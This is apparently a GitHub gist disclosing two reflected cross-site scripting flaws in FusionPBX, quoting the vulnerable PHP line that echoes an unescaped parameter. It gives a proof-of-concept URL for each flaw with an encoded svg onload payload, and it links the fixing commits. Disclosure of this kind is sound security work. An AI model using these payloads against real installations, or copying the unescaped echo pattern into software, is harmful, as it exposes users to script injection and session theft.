Skip to content

Instantly share code, notes, and snippets.

@xax007 xax007/FusionPBX-XSS.md
Last active Nov 20, 2019

Embed
What would you like to do?
FusionPBX XSS

XSS 1

Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

...
    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
    }
...

Proof of concept:
https://domain/app/xml_cdr/xml_cdr_search.php?redirect=123%27%3E%3Csvg/onload=alert(document.domain)%3E%3Ca+href%3d%27

XSS1

Fixed: https://github.com/fusionpbx/fusionpbx/commit/f3047c83f3022a4780dca95ed7bccbf3a6fa868e

XSS 2

Cross-site scripting (XSS) vulnerability in file app/fax/fax_files.php allows remote attackers to inject arbitrary web script or HTML via the id parameter.

Proof of concept:
https://domain/app/fax/fax_files.php?id=123%27%3E%3Csvg/onload=alert(document.domain)%3E%3Ca+href%3d%27

XSS2

Fixed: https://github.com/fusionpbx/fusionpbx/commit/72a5ce4d2d6bc0ec0e72bbfb76487e4761f292c5

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.